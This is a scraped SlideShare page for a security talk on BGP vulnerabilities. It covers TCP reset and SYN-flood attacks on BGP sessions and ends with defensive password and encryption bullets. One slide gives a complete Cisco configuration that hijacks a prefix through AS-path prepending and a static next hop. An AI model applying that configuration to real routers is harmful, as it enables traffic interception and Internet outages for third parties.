Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
HTTP://IPSECS.COM           TIME TO SHUTDOWN              INTERNET CORE ROUTER
COMMUNICATION Analog communication Digital communication Analog communication to  digital communication  convergence I...
FUTURE            COMMUNICATION IP based communication will become  the core communication? Scalability and reliability ...
CORE COMMUNICATION   Access Control List?   Default password issue?   Weak password?   Unencrypted remote login?   Ro...
BGP VULNERABILITY BGP messages TCP vulnerability BGP internet man in the  middle Documented on RFC 4272
BGP MESSAGES BGP states? idle, connect, active,  opensent, openconfirm, established BGP message? open, update, notificat...
TCP VULNERABILITY   BGP and TCP port 179   SPOOFED TCP RST/FIN?   TCP port flooding (SYN)   TCP session ends = BGP idle
BGP MAN IN THEMIDDLE More specific network prefix wins Use tracroute to identify routing  from source to destination Us...
router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outne...
SOME POLICIES   Design and topology?   Access Control List implementation?   Complex password   Encrypted connection (...
DEMO BGP ATTACK
QUESTION? ANSWER
THANK YOU 
BGP Vulnerability
BGP Vulnerability
BGP Vulnerability
BGP Vulnerability
Upcoming SlideShare
Loading in …5
×

BGP Vulnerability

1,865 views

Published on

BGP Vulnerability - Shutdown Internet

Published in: Technology
  • Be the first to comment

  • Be the first to like this

BGP Vulnerability

  1. 1. HTTP://IPSECS.COM TIME TO SHUTDOWN INTERNET CORE ROUTER
  2. 2. COMMUNICATION Analog communication Digital communication Analog communication to digital communication convergence Internet Protocol
  3. 3. FUTURE COMMUNICATION IP based communication will become the core communication? Scalability and reliability communication infrastructure? Vulnerability and security threat?
  4. 4. CORE COMMUNICATION Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway  Protocol (BGP) now
  5. 5. BGP VULNERABILITY BGP messages TCP vulnerability BGP internet man in the middle Documented on RFC 4272
  6. 6. BGP MESSAGES BGP states? idle, connect, active, opensent, openconfirm, established BGP message? open, update, notification, keep alive BGP message modification to poison routing table and Denial of Service Complex and nearly impractical
  7. 7. TCP VULNERABILITY BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle
  8. 8. BGP MAN IN THEMIDDLE More specific network prefix wins Use tracroute to identify routing from source to destination Use route-map and AS-PATH prepending Static routing to give information about next-hop-router
  9. 9. router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outneighbor 2.2.4.2 route­map HIJACK outneighbor 4.3.2.1 remote­as 10neighbor 4.3.2.1 prefix­list ANN outneighbor 5.4.3.1 remote­as 60neighbor 5.4.3.1 prefix­list JACKED outneighbor 5.4.3.1 route­map HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefix­list ANN seq 10 permit 2.2.4.0/24ip prefix­list ANN seq 15 permit 4.3.2.0/24ip prefix­list ANN seq 20 permit 5.4.3.0/24!ip prefix­list JACKED seq 10 permit 2.2.4.0/24ip prefix­list JACKED seq 15 permit 4.3.2.0/24ip prefix­list JACKED seq 20 permit 5.4.3.0/24ip prefix­list JACKED seq 25 permit 10.10.220.0/24route­map HIJACK permit 10set as­path prepend 10 20 200
  10. 10. SOME POLICIES Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)
  11. 11. DEMO BGP ATTACK
  12. 12. QUESTION? ANSWER
  13. 13. THANK YOU 

×